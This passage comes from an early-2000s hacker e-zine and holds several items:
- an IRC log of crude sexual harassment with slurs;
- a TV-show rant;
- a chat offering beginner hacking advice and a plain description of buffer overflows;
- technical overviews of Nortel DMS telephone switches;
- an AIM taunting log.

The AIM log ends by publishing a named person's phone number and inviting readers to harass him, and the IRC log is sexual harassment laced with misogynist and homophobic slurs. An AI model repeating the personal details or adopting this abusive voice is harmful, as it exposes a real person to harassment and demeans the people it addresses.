Ал Outbreak Magazine Issue #10 - Article 7 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Session Start: Thu Oct 10 16:20:58 2002 [16:21] <Lexic0n> so you're an emo kid? [16:21] <emo_kid> what ever could have given you that impression? [16:21] <Lexic0n> no fucking clue [16:21] <Lexic0n> i was thinking and thinking [16:22] <Lexic0n> and i seriously couldn't think of why i wanted to ask you that question [16:22] <emo_kid> ooh, thinking is never good [16:22] <Lexic0n> but it just came to me [16:22] <Lexic0n> kinda like jesus [16:22] <Lexic0n> does jesus come to you little one? [16:22] <emo_kid> yes, every day [16:22] <emo_kid> benji is my jesus *nods* [16:22] <Lexic0n> benji's good [16:22] <Lexic0n> he's good [16:22] <Lexic0n> for shizzle [16:23] <Lexic0n> what about nancy drew [16:23] <Lexic0n> you getting enough reading in? [16:23] * emo_kid shudders at the usage of ebonic-like language [16:23] <emo_kid> you know it [16:23] <Lexic0n> hey [16:23] <Lexic0n> don't diss ebonics [16:23] <Lexic0n> without it you wouldn't have your stupid emo music [16:23] <Lexic0n> remember that [16:23] <emo_kid> *gasp* [16:23] <emo_kid> i'll ignore that. [16:24] <emo_kid> quite uncalled for if i do say so myself.. [16:24] <Lexic0n> you really should stop trying to sound so goddamn brilliant [16:25] <Lexic0n> we all know you're not [16:25] <emo_kid> ha [16:25] <Lexic0n> you're just another kid trying to fit in [16:25] <Lexic0n> so tell me [16:25] <Lexic0n> do you have a penis or a vagina [16:25] <emo_kid> fit in where? on irc? riiiight.. i care about what dumbass computer nerds think of me [16:25] <Lexic0n> apparently you must, after alll [16:25] <Lexic0n> you are here [16:25] <Lexic0n> :) [16:26] <emo_kid> ..and so are you [16:26] <Lexic0n> i'm always here [16:26] <Lexic0n> i cry when they hate me [16:26] <emo_kid> well that's a sad thing to admit, but ok. [16:26] <Lexic0n> i'm so emo [16:26] <Lexic0n> penis or vagina [16:26] <emo_kid> woo.. vagina all the way. [16:27] <Lexic0n> i was thinking [16:27] <Lexic0n> maybe i could come over and finger you [16:27] <Lexic0n> we could make out [16:27] <Lexic0n> and listen to the promise ring [16:27] <emo_kid> or.. you know.. you could fuck off [16:28] <Lexic0n> but i love you [16:28] <Lexic0n> i want to pass you the box of tissues [16:28] <Lexic0n> and write you poems [16:28] <Lexic0n> and kiss your sweet pussy [16:28] <emo_kid> *blinks* that's alright, you have fun with that stick up your ass, bye bye [16:28] <Lexic0n> wait [16:28] <Lexic0n> i love you [16:28] <Lexic0n> honey [16:28] <Lexic0n> don't leave me again [16:28] <Lexic0n> i'm so sick of this [16:29] <Lexic0n> I'LL GIVE YOU BACK YOUR GET UP KIDS CD [16:29] <Lexic0n> I SWEAR [16:29] <emo_kid> if you're going to make fun of the music, why are you in the channel? [16:29] <Lexic0n> i just wanna make love to you underneath the stars [16:29] <Lexic0n> fuck the music [16:30] <Lexic0n> the music means nothing [16:30] <Lexic0n> i'll burn my guitar [16:30] <Lexic0n> i love you baby [16:30] <emo_kid> damn.. someone has issues. shoo, fag, don't bother me. [16:30] <Lexic0n> i love you [16:30] <Lexic0n> i just want to caress your sweet tits [16:30] <Lexic0n> and lick your little pink nipples [16:30] <Lexic0n> come on [16:30] <Lexic0n> baby [16:32] <Lexic0n> baby please don't leave me [16:35] <Lexic0n> FINE YOU WHORE [16:35] <Lexic0n> GO WITH ROSCOE [16:35] <Lexic0n> GO WITH HIM [16:35] <Lexic0n> I HATE YOU [16:35] <Lexic0n> I HATE YOU BITCH [16:36] <emo_kid> roscoe gives me what i need, sorry hon. [16:36] <Lexic0n> YOU WHORE [16:36] <Lexic0n> YOU DIRTY ROTTEN WHORE [16:36] <Lexic0n> you will die [16:36] <Lexic0n> i will kill myself [16:36] <emo_kid> that's me [16:36] <Lexic0n> on your front lawn [16:36] <emo_kid> can't wait [16:37] <Lexic0n> you said you loved me [16:37] <Lexic0n> you said you'd never leave me [16:37] <Lexic0n> my baby cakes [16:37] <Lexic0n> why do you lie to me [16:37] <emo_kid> yea well.. that's what alcohol does to you i suppose. [16:37] <Lexic0n> stop drinking honey [16:37] <Lexic0n> come home [16:38] <emo_kid> nah.. i'll be just fine in the trailor park with roscoe.. he treats me good, unlike you, filthy bastard. [16:39] <Lexic0n> but with my 9 inch penis can't you look past the fact we have to dumpster dive baby? [16:39] <Lexic0n> i fucked you so good [16:39] <Lexic0n> so very good [16:39] <emo_kid> true.. [16:39] <Lexic0n> and i loved you [16:39] <emo_kid> alright, to hell with roscoe. [16:39] <Lexic0n> roscoe just can't do that like me [16:39] <Lexic0n> i love you baby [16:39] <Lexic0n> don't leave me again [16:40] <emo_kid> hm you know, i wasn't trying to act 'so damn brilliant' earlier.. dry humor and sarcasm obviously aren't to your liking [16:41] <Lexic0n> as long as you don't leave me again baby [16:41] <Lexic0n> you can sarcasm and dry humor all you want [16:41] <Lexic0n> i'll take it like you take my 9 inches of hot throbbing man meat [16:42] <emo_kid> hm and how old are you? [16:48] <Lexic0n> 18 honey [16:48] <Lexic0n> you knew that Session Close: Thu Oct 10 17:37:57 2002 Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 8 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' [curb your enthusiasm] [by: joja] [for: outbreak] For those of you who do not have access to HBO, this small rant really doesn't matter. Now, we all know that HBO is great to watch most of your favorite movies, and is one of the(if not THE) best cable channel on television today. But "HBO Original Programming" is another story. HBO Original Programming is the fucking bomb diggity! Let's see, we have: Band of Brothers, a great war series that got amazing ratings, and was all-around kick ass! Then we have Oz, the prison drama which is filled with violence, blood, and all that good shit. A real man's show with many characters some which you may be able to identify with, which makes it even better. Six Feet Under, a series about a disfunctional family that runs a funeral home out of thier house. A great show, somewhat soap opera-like, a lot of drama which keeps your attention, and pisses you off when the show is over. I give it two thumbs and an erect penis up! The Wire. The two-part crime drama. It was simply amazing, I loved it. You get you taste of life on the streets, drugs, sex and crime. And you get your taste of the Badass cops fucking shit up. You got to watch it from both point of views. A definate 3 "thumbs" up. We all know we can't forget the Sopranos! The Mafia, murder, organized crime, drugs, conspiracy, and hot chicks!! How can you now love this show? It's almost to the point where I can't express in words how kick ass it really is.(Meadow, mmm...) Ok, here's my rant. My one and only problem with HBO Original Programming. The 30 minute block of "Curb Your Enthusiasm." This show got ratings such as "Laughing-out-loud hilarious," and "Maybe the best show ever." I want to punch whoever rated this show in the head several times. Curb Your Enthusiasm is the biggest piece of shit show I've ever watched in my entire life, I say that with all my heart. You may say "Well, maybe you're missing the humor." No. I see and get the humor, it just sucks so bad I want to kick my own ass for not changing the channel. Now explain to me how a show such as Curb Your Enthusiasim got lined up with the great shows I mentioned earlier(I forgot RealSex, Shock Video, and America Undercover; which are also kick ass)? HBO has such a great name as far as Television is concerned, how could they shit all over us with Curb Your Enthusiasm? I say the viewers take a vote, a vote to get this puddle of stagnant babboon urine off my TV Guide. Overall, Fuck Larry, fuck Curb Your Enthusiasm and Fuck you too HBO, for having such shitty taste. Yes, It's one bad show out of a lot of great shows. But give me a break, they stooped too low on this one. I could make a better show with a camcorder and my family at Christmas time. Curb Your Enthusiasm sucks! Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 9 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' IRC - Hacking FAQ ================= 2002-10-05 by Timeless timeless@hackstation.tk (the n00b's name was changed to save embarrassment - I'll leave it to you to figure out which one is the n00b, hehehe) ---<begins>--------------------------------------------------------------------- <SomeNewbie> hey <Timeless> hiya <SomeNewbie> what does this channel do? <SomeNewbie> teach? <Timeless> it holds intelligence, so maybe it could teach I suppose <SomeNewbie> well i want to learn <Timeless> you are not the only one, even elite hackers constantly try to learn more <SomeNewbie> hehe <Timeless> today's hack is tomorrow's patch <SomeNewbie> well im a newbe <Timeless> you have many years to go <SomeNewbie> hehe <SomeNewbie> well we all have to start some were right <Timeless> yes, but there is pain involved <SomeNewbie> hehe <Timeless> do you write programs? <SomeNewbie> im learning <Timeless> good, learn more <Timeless> all languages <SomeNewbie> i know some c++ <SomeNewbie> and i learned pascal <SomeNewbie> but thats kindof i useless <Timeless> learn some assembly <Timeless> :) <Timeless> to give you an idea of some real hacking, check out the tutorials on buffer and stack overflows on this page: www.roothack.org <Timeless> the links are on the right <SomeNewbie> i c <Timeless> there are some nice debugger tips in there too <SomeNewbie> so this can do it? <Timeless> it's a start <Timeless> "it" is never done <SomeNewbie> hehe tru <SomeNewbie> what will this site teach? <Timeless> it will hopefully help you to understand good coding practices <SomeNewbie> kool <Timeless> by knowing the flaws you can write good strong code <SomeNewbie> do i apply for the game? <Timeless> heh, the game is way too advanced <Timeless> don't bother with the game yet <SomeNewbie> o lol <Timeless> do you run Linux? <SomeNewbie> ok ill just read up on it then <Timeless> k <SomeNewbie> i run a xp <SomeNewbie> adn a mac <Timeless> Jaguar? <SomeNewbie> yup <Timeless> kewl <Timeless> under the hood is like BSD <Timeless> a type of Unix <Timeless> get your hands dirty <SomeNewbie> hehe <Timeless> also get a spare box up and try running RedHat Linux <Timeless> setup firewalls, web servers, etc. <SomeNewbie> i tried that 1ce <Timeless> kewl <Timeless> try it more <SomeNewbie> i dont like it much <SomeNewbie> i couldnt even get on the internet <SomeNewbie> hehe <Timeless> the more you expose yourself to this kind of stuff the more likely you are to get an instinct for it <Timeless> make some dynamic web sites, try see the related security issues <SomeNewbie> ok <SomeNewbie> ill check it out <Timeless> examine the various network protocols <Timeless> get a feel for what is going on behind the scenes <SomeNewbie> right <Timeless> see how quickly that got like really big?! <Timeless> lots to do <SomeNewbie> ya lol <Timeless> hope you're young <Timeless> :) <SomeNewbie> hehe <Timeless> ... it will take half your life to become a well-rounded elite hacker/cracker etc. <SomeNewbie> wow <SomeNewbie> i thought u just learn it <SomeNewbie> like reading a book <SomeNewbie> lolol <Timeless> um, no, unfortunately <Timeless> hehe <Timeless> I wish <SomeNewbie> ya <Timeless> considering many things change <SomeNewbie> that would be nice <Timeless> at a rapid rate <SomeNewbie> tru <Timeless> which is why the instinct thing is important <Timeless> what's your profession? <SomeNewbie> im in school <Timeless> ok <Timeless> anyone else you know that likes the same kind of thing? (hacking) <SomeNewbie> not really <Timeless> yeah, me neither <SomeNewbie> hehe <SomeNewbie> what kind of stuff can u do ? <SomeNewbie> like hacking <Timeless> I'm too far gone now, people I know wouldn't understand even the simplest of things I have to talk about <SomeNewbie> lol <Timeless> well, I've done all kinds of things <SomeNewbie> how long did it take u to learn? <Timeless> I am a professional programmer and I worked for an ISP <Timeless> started in 1985 <SomeNewbie> damn <SomeNewbie> been around for a while <Timeless> yep <SomeNewbie> what do u think about LINdows <Timeless> not checked it out yet <Timeless> what do you think of it? <SomeNewbie> heard ne thing interesting? <SomeNewbie> havent tried it either <Timeless> I have heard the odd thing that assures me it exists <SomeNewbie> i c <SomeNewbie> it supposedly can run linux and windows progrmas? <Timeless> other Linuxes run Windows apps using "wine" <Timeless> wine stands for: Wine Is Not an Emulator <Timeless> hehe <Timeless> although, you can run something like bochs if you want to emulate another PC on your current PC <Timeless> bochs can be found on Sourceforge <SomeNewbie> hmm <SomeNewbie> i need to learn to use linux to hakc? <Timeless> you need to expose yourself to many OS'es <Timeless> a lot of serious web hosting companies use RedHat Linux <SomeNewbie> what os u use? <Timeless> heh, I have XP as workstation, RH Linux as firewall/gateway, my other boxes have Debian Linux and Windows 2000 <SomeNewbie> Debian <SomeNewbie> whats that? <Timeless> I can also configure Cisco routers <Timeless> Debian is yet another Linux distro <SomeNewbie> damn <SomeNewbie> im taking a cisco class <Timeless> good <Timeless> I don't get to use Solaris much these days <Timeless> I can't be arsed to buy the hardware <Timeless> am saving up for my first Mac (well, first one for home use anyway) <SomeNewbie> ya <SomeNewbie> i love my mac <SomeNewbie> it can do so much crap <Timeless> and one day I want to continue playing around with MPLCs <Timeless> and I want a mini-PC <Timeless> hehe <SomeNewbie> i got me a dell laptop <Timeless> me too <SomeNewbie> and a dual 1.4 gig g4 <Timeless> it's a bit old tho <Timeless> I like the G4, can't afford one tho <SomeNewbie> mine about 1 year <SomeNewbie> 1ghz <SomeNewbie> ya i had to save for 2 years <Timeless> well done dude <Timeless> impressive <SomeNewbie> hehe <Timeless> one more thing, and this is just me I'm speaking for... I make of rule of never hacking out in the wild. <SomeNewbie> meaning? <Timeless> meaning I won't go hacking for fun <SomeNewbie> then y else would u hack? <Timeless> unless the company pays me to do it to themselves <Timeless> and I have a written contract <SomeNewbie> well,,, <SomeNewbie> lol <Timeless> I hack my own computers to learn <SomeNewbie> LOL <Timeless> I have no motive to hack anyone <SomeNewbie> nicely put <Timeless> ... yet :) <SomeNewbie> hehe <SomeNewbie> let see...... <Timeless> lol <SomeNewbie> could u get into my computer right now? <Timeless> dunno <Timeless> maybe <SomeNewbie> it will prob be extremy easy * Timeless shrugs <SomeNewbie> hehe <Timeless> :) <Timeless> there was a competition/honey pot running recently, XP Home box, default install connected to the net <Timeless> I don't think it was broken into <Timeless> it's when the user starts doing stupid things that makes it easier <SomeNewbie> hehe <Timeless> or if services are open to buffer overflows etc. <SomeNewbie> kool <Timeless> a buffer overflow is basically a way of getting some pre-prepared code of mine to run on your machine, which would in turn download a back door program for me to have a more advanced interaction with your computer <SomeNewbie> thats awsome <Timeless> some buffer overflows can take ages to create once you find a flaw in the software that can be abused <SomeNewbie> thats y u need to be a programer <Timeless> it's sometimes easier to send you a trojan, or get you to view a web site that exploits other known flaws in your web browser for example <Timeless> yes, exactly! <Timeless> being a programmer makes sure that you understand what you are doing <SomeNewbie> thats pretty awsome <Timeless> having worked at an ISP, I also understand how traceable you are too :) <SomeNewbie> so before i try to start ne thing i should learn more programming <Timeless> yes <SomeNewbie> what isp u work for? <Timeless> I used to work for www.********.co.zw - Zimbabwe's leading ISP, but then I moved to the UK <SomeNewbie> u lived in Zimbabwe? <Timeless> I used to catch hackers in the act, then make them aware I knew what they were doing, scare them a bit, then befriend them - they never attempted to hack my servers again after that <Timeless> it was great <SomeNewbie> hehe <SomeNewbie> sounds awsome <Timeless> having an understanding of web servers and buffer overflows helped me prevent my web servers from being vulnerable to the code red worm - simply use an application-level firewall, like SecureIIS for example on the web server <Timeless> I also write web applications <Timeless> so understanding the HTTP protocol and anything web-related also helps a lot <SomeNewbie> damn <SomeNewbie> u know everything <Timeless> no way! <Timeless> I don't <Timeless> I found the more I learn the less I feel I know <Timeless> there is just too much to learn <Timeless> eventually you find you will specialise in various areas of the art that you like <SomeNewbie> tru <Timeless> I used to crack software - ie. remove 30-day expiry etc. for fun (never to distribute on the net though - bearing in mind my first rule) <SomeNewbie> kool' <Timeless> but that gets a bit boring <Timeless> so I stopped doing it <SomeNewbie> ya? <Timeless> besides, all my software is properly paid for now <SomeNewbie> hehe <SomeNewbie> so what do u do int this channel?> <Timeless> I chat if anyone wants to chat, give and take advice, etc., most people idle here <Timeless> everyone likes to stereotype hackers - I'm just curious, and like computers, but I am also a very responsible person ---<ends>----------------------------------------------------------------------- Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 10 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Specialized Common Carrier Service (SCCS) contibuted by Adeamis The DMS-250 Specialized Common Carrier Service (SCCS) provides the capability of Analog to Digital (A/D) and Digital to Analog (D/A) conversions which are necessary with analog circuits. The DMS-250 can also switch voice and data circuits. The DMS-250 takes either analog or digitally encoded info and by using time slot interchange, switches it from any input port to a temporary addressed and connected exit port. The info may or may not be converted back to analog. Cellular Mobile Radio Service A cellular system consists of two main parts: a cellular switch and cell site equipment. Cellular Switching Systems A cellular switch performs three main functions: audio switching, cell site control, and system administration. The DMS switches provide three basic implementations for cellular switching: Stand-alone, Combined, and Remote. Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is interfaced with one or more class 5 end offices. The connection is made by DID/DOD trunks. Depending on the needs of the area, the MTX can be divided as follows: MTX which serves urban areas, MTXC which handles suburban areas, and MTXM which is used for rural areas. Combined switching is incorporated into a DMS-100 by some hardware additions and cellular software. Combined switching is designed to give an easy, cost-effective way to install cellular services to an existing host. Remote Switching is done by combining Remote Switching Center (RSC) with a Cell Site Controller (CSC). This combination is hosted by either a stand-alone or a combined switch. Remote Switching is designed for serving suburban centers, remote areas, or a small community and it gives extra flexibility for a growing system. All of these cellular switches have the ability to balance the workload among various cell sites. For example, if one site's workload reaches the programmable level of congestion, calls would be routed to nearby sites that can handle the extra calls. Cell Site Equipment Cell site equipment consists of a CSC and radio equipment. The CSC is controlled by the cellular switch and it controls radio equipment and maintenance tasks. The CSC will work on any MTX cellular switch because of the Remote Cluster Controller (RCC). The radio equipment consists of self-contained Radio Channel Units (RCU), antennas, transmitter multi-couplers, and receiver combiners. By different program software, an RCU can perform voice, control locating, and test functions. The self contained nature allows the RCU be remotely located to the CSC. A RCU has built-in circuitry for extended testing of the radio part of the system. Cellular switching i didnt write it Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 11 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Pac Man Ninja ============= by: kleptic <kleptic@grex.org> http://www.kleptic.tk AIM - kl3ptic ============= kl3ptic: Blaine.. my man. kl3ptic: whats going down? KoNkReTeEleMeNt: who is this kl3ptic: Nick you silly bastard kl3ptic: heh kl3ptic: whats up? KoNkReTeEleMeNt: well then why did u im me on the other name kl3ptic: cause im an elite ninja.. why else? kl3ptic: dont be a dipshit blaine. kl3ptic: say kl3ptic: we getting together this weekend? kl3ptic: to party like a mother fucker? KoNkReTeEleMeNt: who is this kl3ptic: i just told you .. did you get your head beat in as a 4 year old? kl3ptic: its fucking Nick kl3ptic: mullet and all dude KoNkReTeEleMeNt: nick who kl3ptic: what do you mean nick who? kl3ptic: quit being a dick kl3ptic: hey, i got pac man arcade classic dude kl3ptic: you in? kl3ptic: its the shit kl3ptic: not that fucking mrs. pac man bull kl3ptic: all out PAC MAN kl3ptic: you down with this shit? KoNkReTeEleMeNt: nick that hangs out with andrew kl3ptic: c'mon Blaine.. don't be a pansy ass. kl3ptic: Pac Man Blaine kl3ptic: Pac to the mother fucking Man KoNkReTeEleMeNt: u quit fucking with me yo KoNkReTeEleMeNt: who to the mother fuck is this kl3ptic: DUDE. I'm not fucking with you.. kl3ptic: Are you scared of my pac man ninja skills Blaine? kl3ptic: You think you can take me in Pac Man? kl3ptic: Oh OH! I think not my friend! KoNkReTeEleMeNt: dude get a life kl3ptic: hey dude. If you're scared. That's cool. kl3ptic: I mean, i would be scared too.. if i had to take on the fucking PAC MAN NINJA! kl3ptic: damn straight KoNkReTeEleMeNt: oh oh im not scared kl3ptic: right ;-) kl3ptic: you're pissing your little cammo panties kl3ptic: c'mon blaine.. lets pac man this shit up kl3ptic: lets do this old school KoNkReTeEleMeNt: yo fuck u kid kl3ptic: like willy from the wizard! kl3ptic: yeah! kl3ptic: hey man. you a little scared? kl3ptic: little yellow stripe down your pac man wussy back? kl3ptic: thats cool kl3ptic: Fear my Pac Man ninja skills kl3ptic: cause when those Ghosts come up kl3ptic: i fucking chomp those bitches kl3ptic: left and right kl3ptic: fear KoNkReTeEleMeNt: ok then tell me the last name kl3ptic: lowwer or how ever you spell it kl3ptic: bizatch KoNkReTeEleMeNt: no urs bitch kl3ptic: You don't need my name. You just address me as "Pac Man Ninja" kl3ptic: oh yes. kl3ptic: I'll Ninja spike your ass back to pac man land bizatch! kl3ptic: make you shit your little cammo panties KoNkReTeEleMeNt: yo if this is brian ill strait fuck u up bitch kl3ptic: brian? kl3ptic: this is Nick you little Mrs. Pac Man pansy KoNkReTeEleMeNt: yo who ever it is dont let me cacth ur bitch ass kl3ptic: you wont be able to. kl3ptic: cause im a freaking ninja kl3ptic: pac man style kl3ptic: just when you think you're alone.. . BAM.. ninja spike to the back of the skull kl3ptic: drop kick your nuts.. make you piss your camo panties KoNkReTeEleMeNt: ok peace u want to talk some shit here is my number call me now bitch 789 8203 kl3ptic: i already got it kl3ptic: and i will call ;-) ============================================================== Some kid wanted me to harass him.. so I did.. here's his info if you want to harass him: Blaine Lowwer 410-789-8203 More of my logs can be found on my site: http://www.kleptic.tk ============================================================== Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 12 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Digital Multiplexing System By Adeamis Dms was made by the northern telecom in 1979 and can be interfaced with the listed switches 1.ESS 1-4 2.Xbar 3.TSPS 4.EAX The dms was made to be small to have room for other installations LCM line concentrating module MDF main distribution frame DMS are in the Class5 Switching DMS 100 integrates voice and data in a total business communications system and up to 30,000 lines DMS-10 for up to 10,800 lines mostly connected with big brother dms 100 or 200 switch DMS 200 access's 60,000 trunks also serve a AT access tandem function can also control controls Operater-assisted calls DMS 250 not often used The Phukin Functions Call Waiting Lamp Loop Keys - There are 6 loop keys, each with its associated source and destination lamp to indicate the calling and called party states. Alphanumeric Display Multiple Directory Numbers Feature Keys - Up to a total of 42. Some of them could be used for Speed Calling and Paging System. Incoming Call Identifier Exclude Source/Exclude Destination - privacy keys Signal Source/Signal Destination: Release Source/Release Destination Console Access to paging Call hold Call detail entry Remote console Call Selection Console display Camp-on Automatic recall Conference - 6 port Two-way splitting Non-delayed operation Attendant transfer Locked loop operation Busy verification of lines Manual and automatic hold Multiple console operation Busy verification of trunks Switched loop operation Trunk g roup busy indication Uniform call distribution form queue Multiple listed directory numbers Control of trunk group access Secrecy Night service Serial call Speed calling Lockout Delayed operation Position busy Interposition calling Through dialing Dms allows BUSINESS's to have LCD Indicators Call Forwarding Automatic Line Call Pick-up Ring Again - automatically redials busy numbers until they are free Multiple Directory Numbers Intercom Speed Call Call Transfer/Conference On-Hook Dialing Programmable Functions Automatic Hold Listen-on Hold Multiple Appearance Directory Numbers (MADN) Single Call Arrangement Multiple Call Arrangement Privacy Release Tone Ringing with Volume Control End-to-End Signaling Call Park Make Set Busy Malicious Call Trace Busy Override Attendant Recall Call Waiting Stored Number Redial Private Business Line 32 Character Alphanumeric Display wich as you can see most of that shit they use everywhere so dms are very popuLAR DMS is remote switching with a bunch of remote modules in a bunch of sizes and capabilities including SXS replacement or growth and Office feature's. The use of remote modules give the CO more floor space that would usually be used by the Line Concentrating Modules Trunk Module (TM) The Trunk Module - changes incoming speech into digital format, it has the ability to handle 30 analog trunks. The Pulse Code Modulation (PCM) information is combined with the trunks supervisory and control signals then transmitted at 2.56 Mb/s over speech links to the network not just with landlines. The TM also uses service circuits such as Multifrequency (MF) receivers, announcement trunks, and test circuits. Each TM has the ability to interface 30 analog trunks or service circuits to the network over one 32-channel speech link. The TM is not traffic sensitive so each trunk can carry 36 CCS. Digital Carrier Module The Digital Carrier Module (DCM) is a digital interface between the DMS switch and the DS-1 digital carrier. The DS-1 signal consists of 24 voice channels. The DCM takes out and puts in signaling and control information on the DS-1 bit streams which then makes them DS-30 32-channel speech links. The DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32- channel speech links. The DCM can carry a maximum of 36 CCS of traffic on each trunk. Line Module The Line Module (LM) gives an interface for a maximum of 640 analog lines and condenses the voice and signaling into two, three, or four DS-30, 32-channel speech links. Four speech links have the ability to handle 3,700 Average Busy Season Busy Hour (ABSBH) CCS per LM. Operator Features With the use of DMS-200 or DMS 100/200 switch, operator features are available by the following: Traffic Operator Position System (TOPS) Operator Centralization (OC) Auxiliary Operator Service System (AOSS) Traffic Operator Position System (TOPS) gives many operator function on inward and outward calls. The TOPS integrates the operator system with the DMS-200 or DMS-100/200 toll switch. One voice and one data circuit are needed for each operator position. The voice circuit is connected to a port of a three-port conference circuit. The other two ports are connected to the calling and called parties. The data circuit is used for a digital modem and is used to transmit data punched in by the operator to the CCC for processing. Operator Centralization Operator Centralization (OC) lets the operator use the services given by the DMS-200 or DMS-100/200 with TOPS. With OC operator traffic from surrounding DMS sites can be routed to a central host site. Operator Centralization Diagram Routing - - - <-----\ DMS-200 | AMA | \ Remote TC / - - - = = = = = = = / | \ ----- ___|_/ | \: DMS : | | : 200 : | Host TC ----- | : : | = = = = = = = = /| POS | | : (OC:___| | --------- | / |- - -| | : : |\ | : DMS-200 : | / |Oper.| | -----\ | \ | : (TOPS) :__|_/ ----- = = = = = = = \____________|__: : | Trib Ope Traffic->\ ____________|__:OC) : | \ / | : : | Non-DMS Remote TC / | --------- | = = = = = = = = = = = = = = = = = = = | -------- ----- | | : TDM : : (OC: | | : Switch : : : | ----- | : : : DMS :_|_____: AMA : | : : : 200 : | ----- | /-------- -----\ | = = = = = = = = = = = /Routing \ <-Trib Opr Traffic \-------> \ Equal Access Equal Access (EA) is accessible through DMS switches with the addition of software packages. Both Equal Access End Office (EAEO) for the DMS-100 and Access Tandem (AT) for the DMS-200 provide equal access features. Equal Access Network Application --------- __________________________________ (Phone)--------| DMS-100 |___________ | --------- | | NON-EAEO | |IC/INC -------- -------- /---------\ TO (Phone)---| |------------| DMS-200 |------------ ---- IC/INC -------- --------- \---------/ /-----> | | --------- ___________| | (Phone)--------| DMS-100 |__________________________________| --------- DMS-100 EAEO The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport Area) carriers Point of Presence (POP) inside the LATA. The DMS-200 AT gives a traffic concentration and distribution function for interLATA traffic originating or terminating inside a LATA. It allows the following: 10XXX and 950-1XXX dialing presubscription dialing equal access and normal network control signaling Automatic Number Identification (ANI) on all calls custom calling services Common Channel Interoffice Signaling No. 6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The basis for the CCIS system is the International Consultative Committee on Telephone and Telegraph (CCITT) No. 6 international standard, which is brought to its fullest capacity for use in the Stored Program Control (SPC) network of AT&T. The CCIS6 network contains a bunch of signaling regions, each having a pair of interconnected Signal Transfer Points (STP). The switching systems put into CCIS6 that connect to STPs are called Serving Offices (SO). Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type trunks using the CCIS network. Direct Signaling (CCIS-DS) is used for signaling between SPC switching machines and a Network Control Point (NCP). At the present time, CCIS6 can handle Enhanced INWATS Originating Screening Office (OSO), Calling Card Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number Screening (BNS). CCIS6 is available with DMS-100/200, DMS-200, and DMS-100/200 or DMS-200 with TOPS. CCIS6 Diagram: NSB ST ------------ - - - - - - - - - - - DTC | | | ------- | - - - DS30 | IPML | DS30 | - - - | || | | --------| |------|- - - - - - |------|-| |---| || | | Digital - - - | | | - - - | || | | Trunks | | | | || | | | | | ------- | | | - - - - - - -|- - - - DTC | | TM | DIG - - - DS30 | NUC | DS30 - - - ----- --------| |------|- - - - - - |--------| |----| | ^ - - - |Network | - - - ----- CCIS \ ------------ Modem Signaling \ | - - - ----- AN Links--| | | CCC | - - - ----- Channel Bank Acronyms: DIG - Digital AN - Analog DTC - Digital Trunk Controller MSB - Message Switch Buffer ST - Signaling Terminal TM - Trunk Module NUC - Nailed-Up Connection IPML - Inter-Peripheral Message Link Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system based on CCITT No. 7. CCIS7/CCS7 on the DMS switch consists of two parts: the Message Transfer Part (MTP) and the Interim Telephone user Part. They are compatible with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS. CCIS7 can't tell the difference between banded and direct signaling. CCIS7 uses Destination/Origination Point Codes (DPC/OPC) to route back to the switch. CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS, Local Area Signaling Services, and Direct Service Dialing Capabilities. A DMS-100 IBN or SL-100 can remotely serve many locations from the host site. This is done by a connection through digital transmission facilities which are set up at remote modules at the subscriber's premises. Here are some diagrams showing the differences between normal private telecommunications networks and ESN networks. Normal telecommunications network ----- ------ [Fone]--| SnS | | SL-1 |-[Fone] | PBX | | PBX | ----- ------ | |DOD/DID DOD/DID| | | ------- ------- | |Tie | | Tie| |Trunk --------- Trunk| ------| Class-5 |------ ----| Centrex |---- | --------- | | | | | | | ----- Tie Trunk --------- | SnS | ----------| Class-5 | | PBX | | Centrex | ----- --------- | | | | | | | | ------- ------ [Fone]-| Small | | SL-1 |-[Fone] | PBX | | | ------- ------ ESN Network =========== -------- ---------- [Fone]--| Remote | | SL-1 PBX |--[Fone] | Module | | ESN Main | -------- ---------- | | | DS-1 Facility | DS-1 Facility | 